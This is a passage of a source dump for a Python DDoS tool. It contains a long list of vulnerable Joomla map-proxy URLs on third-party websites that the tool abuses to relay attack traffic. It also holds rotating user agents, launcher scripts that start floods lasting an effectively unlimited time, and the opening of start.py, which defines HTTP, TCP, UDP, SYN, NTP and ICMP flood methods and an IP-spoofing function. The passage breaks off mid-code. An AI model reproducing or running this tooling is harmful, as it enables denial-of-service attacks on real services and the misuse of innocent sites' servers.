http://www.gaston-schul.nl/DU/plugins/content/plugin_googlemap2_proxy.php?url= 471 | http://www.gaston-schul.nl/FR/plugins/content/plugin_googlemap2_proxy.php?url= 472 | http://www.gillinghamgurdwara.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url= 473 | http://www.gilmeuble.ch/cms/plugins/content/plugin_googlemap2_proxy.php?url= 474 | http://www.hortonmccormick.com/cms/plugins/content/plugin_googlemap2_proxy.php?url= 475 | http://www.icel.be/cms/plugins/content/plugin_googlemap2_proxy.php?url= 476 | http://www.idea-designer.com/idea/plugins/content/plugin_googlemap2_proxy.php?url= 477 | http://www.jana-wagenknecht.de/wcms/plugins/content/plugin_googlemap2_proxy.php?url= 478 | http://www.kanzlei-berendes.de/homepage/plugins/content/plugin_googlemap2_proxy.php?url= 479 | http://www.kita-spielhaus.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 480 | http://www.kjg-hemer.de/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 481 | http://www.labonnevie-guesthouse-jersey.com/site/plugins/content/plugin_googlemap2_proxy.php?url= 482 | http://www.lacasaencarilo.com.ar/sitio/plugins/content/plugin_googlemap2_proxy.php?url= 483 | http://www.losaromos-spa.com.ar/cms/plugins/content/plugin_googlemap2_proxy.php?url= 484 | http://www.losaromos-spa.com.ar/~losaromo/cms/plugins/content/plugin_googlemap2_proxy.php?url= 485 | http://www.nickclift.co.uk/web/plugins/content/plugin_googlemap2_proxy.php?url= 486 | http://www.oliebollen.me/plugins/content/plugin_googlemap2_proxy.php?url= 487 | http://www.palagini.it/palagini/plugins/content/plugin_googlemap2_proxy.php?url= 488 | http://www.paro-nl.com/v2/plugins/content/plugin_googlemap2_proxy.php?url= 489 | http://www.parsifaldisco.com/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 490 | http://www.podosys.com/csm/plugins/content/plugin_googlemap2_proxy.php?url= 491 | http://www.precak.sk/penzion/plugins/content/plugin_googlemap2_proxy.php?url= 492 | http://www.pyrenees-cerdagne.com/plugins/content/plugin_googlemap2_proxy.php?url= 493 | http://www.renault-windisch.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 494 | http://www.rethinkingjournalism.com/plugins/content/plugin_googlemap2_proxy.php?url= 495 | http://www.riegler-dorner.at/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 496 | http://www.sealyham.sk/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 497 | http://www.seevilla-dr-sturm.at/cms/plugins/content/plugin_googlemap2_proxy.php?url= 498 | http://www.siroki.it/newsite/plugins/content/plugin_googlemap2_proxy.php?url= 499 | http://www.sounders.es/plugins/content/plugin_googlemap2_proxy.php?url= 500 | http://www.suelcasa.com/suelcasa/plugins/content/plugin_googlemap2_proxy.php?url= 501 | http://www.tcl.lu/Site/plugins/content/plugin_googlemap2_proxy.php?url= 502 | http://www.tijssen-staal.nl/site/plugins/content/plugin_googlemap2_proxy.php?url= 503 | http://www.triatarim.com.tr/TriaEn/plugins/content/plugin_googlemap2_proxy.php?url= 504 | http://www.tus-haltern.de/site/plugins/content/plugin_googlemap2_proxy.php?url= 505 | http://www.uchlhr.com/plugins/content/plugin_googlemap2_proxy.php?url= 506 | http://www.virmcc.de/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 507 | http://www.visitsliven.com/bg/plugins/content/plugin_googlemap2_proxy.php?url= 508 | http://www.vm-esslingen.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 509 | http://www.yigilca.gov.tr/_tr/plugins/content/plugin_googlemap2_proxy.php?url= 510 | http://www.zahnarzt-buhl.de/praxis/plugins/content/plugin_googlemap2_proxy.php?url= 511 | http://www.sultanpalace.nl/site/plugins/content/plugin_googlemap2_proxy.php?url= 512 | http://www.bergenpol.com/cms//plugins/content/plugin_googlemap2_proxy.php?url= 513 | http://www.arantzabelaikastola.com/webgunea//plugins/content/plugin_googlemap2_proxy.php?url= 514 | http://www.fare-furore.com/plugins/content/plugin_googlemap2_proxy.php?url= 515 | http://www.dog-ryusen.com/plugins/system/plugin_googlemap2_proxy.php?url= 516 | http://www.dunaexpert.hu/home/plugins/content/plugin_googlemap2_proxy.php?url= 517 | http://www.spvgg-roedersheim.de/web/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 518 | http://www.stephanus-web.de/joomla1015/mambots/content/plugin_googlemap2_proxy.php?url= 519 | http://www.dahlnet.no/v2/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 520 | http://ping-admin.ru/index.sema;POST;ping-admin.ru.txt 521 | http://web-sniffer.net/?url= 522 | http://www.map-mc.com/plugins/system/plugin_googlemap2_proxy.php?url= 523 | http://sova-tour.com.ua/plugins/system/plugin_googlemap2_proxy.php?url= 524 | http://diegoborba.com.br/andes/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 525 | http://karismatic.com.my/new/plugins/content/plugin_googlemap2_proxy.php?url= 526 | http://scu-oldesloe.de/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 527 | http://www.awf.co.nz/plugins/system/plugin_googlemap3_proxy.php?url= 528 | http://translate.yandex.ru/translate?srv=yasearch&lang=ru-uk&url= 529 | http://translate.yandex.ua/translate?srv=yasearch&lang=ru-uk&url= 530 | http://translate.yandex.net/tr-url/ru-uk.uk/ 531 | http://www.oldbrogue.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 532 | http://www.mcdp.eu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 533 | http://www.phimedia.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 534 | http://www.bongert.lu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 535 | http://laresmadrid.org/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 536 | http://www.epcelektrik.com/en/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 537 | http://doleorganic.com/plugins/content/plugin_googlemap2_proxy.php?url= 538 | http://crawfordlivestock.com/plugins/system/plugin_googlemap2_proxy.php?url= 539 | http://www.aculaval.com/joomla/plugins/system/plugin_googlemap2_proxy.php?url= 540 | http://grandsultansaloon.com/plugins/system/plugin_googlemap2_proxy.php?url= 541 | http://www.d1010449.cp.blacknight.com/cpr.ie/plugins/content/plugin_googlemap2_proxy.php?url= 542 | http://www.architettaresas.it/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 543 | http://basketgbkoekelare.be/plugins/content/plugin_googlemap2_proxy.php?url= 544 | http://www.arbitresmultisports.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 545 | http://mobilrecord.com/plugins/content/plugin_googlemap2_proxy.php?url= 546 | http://www.oldbrogue.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 547 | http://www.mcdp.eu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 548 | http://www.dbaa.co.za/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 549 | http://waggum-bevenrode.sg-bevenrode.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 550 | http://bwsnt1.pdsda.net/plugins/system/plugin_googlemap3_proxy.php?url= 551 | http://www.astecdisseny.com/plugins/content/plugin_googlemap2_proxy.php?url= 552 | http://www.fillmorefairways.com/plugins/content/plugin_googlemap2_proxy.php?url= 553 | http://www.bus-reichert.eu/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 554 | http://www.maxxxi.ru/plugins/system/plugin_googlemap2_proxy.php?url= 555 | http://potholepeople.co.nz/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 556 | http://www.hammondgolf.com/plugins/system/plugin_googlemap2_proxy.php?url= 557 | http://www.footgoal33.com/plugins/content/plugin_googlemap2_proxy.php?url= 558 | http://www.printingit.ie/plugins/content/plugin_googlemap2_proxy.php?url= 559 | http://bbtoma.com/plugins/content/plugin_googlemap2_proxy.php?url= 560 | http://www.tajmahalrestaurant.co.za/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 561 | http://www.yerbabuenacuisine.com/plugins/system/plugin_googlemap2_proxy.php?url= 562 | http://www.rinner-alm.com/plugins/system/plugin_googlemap2_proxy.php?url= 563 | http://stockbridgetownhall.co.uk/plugins/content/plugin_googlemap2_proxy.php?url= 564 | http://mentzerrepairs.com/plugins/system/plugin_googlemap2_proxy.php?url= 565 | http://www.tilmouthwell.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 566 | http://www.homevisionsinc.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 567 | http://toddlers.nalanda.edu.in/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 568 | http://cultura-city.rv.ua/plugins/system/plugin_googlemap3_proxy.php?url= 569 | http://secret.leylines.info/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 570 | http://bike-electric.co.uk/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 571 | http://www.centroaquaria.com/plugins/content/plugin_googlemap2_proxy.php?url= 572 | http://agenzia-anna.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 573 | http://www.gretnadrug.com/plugins/system/plugin_googlemap2_proxy.php?url= 574 | http://www.crestwoodpediatric.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 575 | http://www.oceans-wien.com/plugins/system/plugin_googlemap2_proxy.php?url=;BYPASS -------------------------------------------------------------------------------- /files/useragent.txt: -------------------------------------------------------------------------------- 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 5 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 7 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15 8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 9 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 10 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 11 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362 13 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0 14 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 15 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 16 | Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 17 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15 18 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 19 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 OPR/63.0.3368.107 20 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 21 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15 22 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 23 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763 24 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 25 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 26 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 YaBrowser/19.9.3.314 Yowser/2.5 Safari/537.36 27 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 28 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 29 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36 30 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 31 | Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko 32 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0 33 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 34 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15 35 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 36 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15 37 | Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 38 | Mozilla/5.0 (X11; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0 39 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15 40 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 41 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 42 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 43 | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 44 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15 45 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 46 | Mozilla/5.0 (Windows NT 6.1; rv:69.0) Gecko/20100101 Firefox/69.0 47 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15 48 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:69.0) Gecko/20100101 Firefox/69.0 49 | Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 50 | Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 51 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0 52 | Mozilla/5.0 (Linux; U; Android 4.3; en-us; SM-N900T Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 53 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 54 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 55 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 56 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36 57 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134 58 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 59 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0 60 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 61 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 62 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.75 Safari/537.36 63 | Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0 64 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 65 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/77.0.3865.90 Chrome/77.0.3865.90 Safari/537.36 66 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 67 | Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 68 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 69 | Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0 70 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 71 | Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0 72 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 73 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15 74 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15 75 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 OPR/63.0.3368.107 76 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko/20100101 Firefox/69.0 77 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 78 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.2.14 79 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 80 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36 81 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3835.0 Safari/537.36 82 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 83 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 84 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0 85 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393 86 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 87 | Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko 88 | Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4 89 | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 90 | Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G570Y Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36 91 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.5.01003) 92 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 93 | Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8 94 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) 95 | Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en] 96 | Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 97 | Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1 -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | pysocks 3 | socks 4 | cfscrape 5 | icmplib 6 | scapy 7 | -------------------------------------------------------------------------------- /run-termux.sh: -------------------------------------------------------------------------------- 1 | #!/data/data/com.termux/files/usr/bin/bash 2 | cd 2> /dev/null 3 | 4 | if [ ! -f ~/../usr/bin/python3 ]; then 5 | pkg update -y 6 | pkg upgrade -y 7 | pkg install wget python3 -y 8 | fi 9 | cd ~/ddos_python3 10 | python3 start.py get khanh 1 120 socket5.txt 65500 999999999999999 $@ 11 | exit 12 | -------------------------------------------------------------------------------- /run.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | TITLE DDOS Using Python3 [KhanhNguyen9872] 3 | 4 | :CHECKPYTHON 5 | python --version 3>NUL 6 | if errorlevel 1 goto ERROR 7 | goto MAIN 8 | 9 | :MAIN 10 | python start.py get khanh 1 120 socket5.txt 65500 999999999999999 %1 %2 11 | pause 12 | exit 13 | 14 | :ERROR 15 | cls 16 | echo. 17 | echo Error^: Python not installed 18 | echo. 19 | start "" "https://python.org/downloads/windows" 20 | pause 21 | exit 22 | -------------------------------------------------------------------------------- /run.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | if [ ! -f /usr/bin/python3 ] 2> /dev/null; then 4 | sudo apt-get update -y 5 | sudo apt-get install wget python3 python3-pip -y 6 | fi 7 | if [ ! -f /usr/bin/pip3 ] 2> /dev/null; then 8 | sudo apt-get update -y 9 | sudo apt-get install python3-pip -y 10 | fi 11 | python3 start.py get khanh 1 120 socket5.txt 65500 999999999999999 $@ 12 | exit 13 | -------------------------------------------------------------------------------- /socks5.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /start.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | 4 | l7 = ["CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "OSTRESS", "DYN", "SLOW", "HEAD", "HIT", "NULL", "COOKIE", "BRUST", "PPS", "EVEN", "GSB", "DGB", "AVB"] 5 | l4 = ["TCP", "UDP", "SYN", "VSE", "MEM", "NTP"] 6 | l3 = ["POD", "ICMP"] 7 | to = ["CFIP", "DNS", "PING", "CHECK", "DSTAT", "INFO"] 8 | ot = ["STOP", "TOOLS", "HELP"] 9 | methods = l7 + l4 + l3 10 | methodsl = l7 + l4 + l3 + to + ot 11 | 12 | try: 13 | import os 14 | except: 15 | print("system error!") 16 | exit() 17 | 18 | def clear_screen(): 19 | if (os.name == "nt"): 20 | os.system('cls') 21 | else: 22 | os.system('clear') 23 | 24 | def spoofer(): 25 | addr = [192, 168, 0, 1] 26 | d = '.' 27 | addr[0] = str(random.randrange(11, 197)) 28 | addr[1] = str(random.randrange(0, 255)) 29 | addr[2] = str(random.randrange(0, 255)) 30 | addr[3] = str(random.randrange(2, 254)) 31 | assemebled = addr[0] + d + addr[1] + d + addr[2] + d + addr[3] 32 | return assemebled 33 | 34 | 35 | def start_attack(method, threads, event, socks_type): 36 | global out_file 37 | # layer7 38 | cmethod = str(method.upper()) 39 | if (cmethod != "HIT") and (cmethod not in l4) and (cmethod not in l3) and (cmethod != "OSTRESS"): 40 | out_file = str("files/proxys/" + sys.argv[5]) 41 | proxydl(out_file, socks_type) 42 | print("{} Attack Started To {}:{} For {} Seconds With {}/{} Proxy ".format(method, target, port, sys.argv[7],len(proxies), str(nums))) 43 | else: 44 | print("{} Attack Started To {}:{} For {} Seconds".format(method, target, port, sys.argv[7])) 45 | try: 46 | if method == "post": 47 | for _ in range(threads): 48 | threading.Thread(target=post, args=(event, socks_type), daemon=True).start() 49 | elif method == "brust": 50 | for _ in range(threads): 51 | threading.Thread(target=brust, args=(event, socks_type), daemon=True).start() 52 | elif method == "get": 53 | for _ in range(threads): 54 | threading.Thread(target=http, args=(event, socks_type), daemon=True).start() 55 | elif method == "pps": 56 | for _ in range(threads): 57 | threading.Thread(target=pps, args=(event, socks_type), daemon=True).start() 58 | elif method == "even": 59 | for _ in range(threads): 60 | threading.Thread(target=even, args=(event, socks_type), daemon=True).start() 61 | elif method == "ovh": 62 | for _ in range(threads): 63 | threading.Thread(target=ovh, args=(event, socks_type), daemon=True).start() 64 | elif method == "capb": 65 | for _ in range(threads): 66 | threading.Thread(target=capb, args=(event, socks_type), daemon=True).start() 67 | elif method == "cookie": 68 | for _ in range(threads): 69 | threading.Thread(target=cookie, args=(event, socks_type), daemon=True).start() 70 | elif method == "tor": 71 | for _ in range(threads): 72 | threading.Thread(target=tor, args=(event, socks_type), daemon=True).start() 73 | elif method == "bypass": 74 | for _ in range(threads): 75 | threading.Thread(target=bypass, args=(event, socks_type), daemon=True).start() 76 | elif method == "head": 77 | for _ in range(threads): 78 | threading.Thread(target=head, args=(event, socks_type), daemon=True).start() 79 | elif method == "stress": 80 | for _ in range(threads): 81 | threading.Thread(target=stress, args=(event, socks_type), daemon=True).start() 82 | elif method == "ostress": 83 | for _ in range(threads): 84 | threading.Thread(target=ostress, args=(event, socks_type), daemon=True).start() 85 | elif method == "null": 86 | for _ in range(threads): 87 | threading.Thread(target=null, args=(event, socks_type), daemon=True).start() 88 | elif method == "cfb": 89 | for _ in range(threads): 90 | threading.Thread(target=cfb, args=(event, socks_type), daemon=True).start() 91 | elif method == "avb": 92 | for _ in range(threads): 93 | threading.Thread(target=AVB, args=(event, socks_type), daemon=True).start() 94 | elif method == "gsb": 95 | for _ in range(threads): 96 | threading.Thread(target=gsb, args=(event, socks_type), daemon=True).start() 97 | elif method == "dgb": 98 | for _ in range(threads): 99 | threading.Thread(target=dgb, args=(event, socks_type), daemon=True).start() 100 | elif method == "dyn": 101 | for _ in range(threads): 102 | threading.Thread(target=dyn, args=(event, socks_type), daemon=True).start() 103 | elif method == "hit": 104 | for _ in range(threads): 105 | threading.Thread(target=hit, args=(event, timer), daemon=True).start() 106 | 107 | # layer4 108 | 109 | elif method == "vse": 110 | for _ in range(threads): 111 | threading.Thread(target=vse, args=(event, timer), daemon=True).start() 112 | elif method == "udp": 113 | for _ in range(threads): 114 | threading.Thread(target=udp, args=(event, timer), daemon=True).start() 115 | elif method == "tcp": 116 | for _ in range(threads): 117 | threading.Thread(target=tcp, args=(event, timer), daemon=True).start() 118 | elif method == "syn": 119 | for _ in range(threads): 120 | 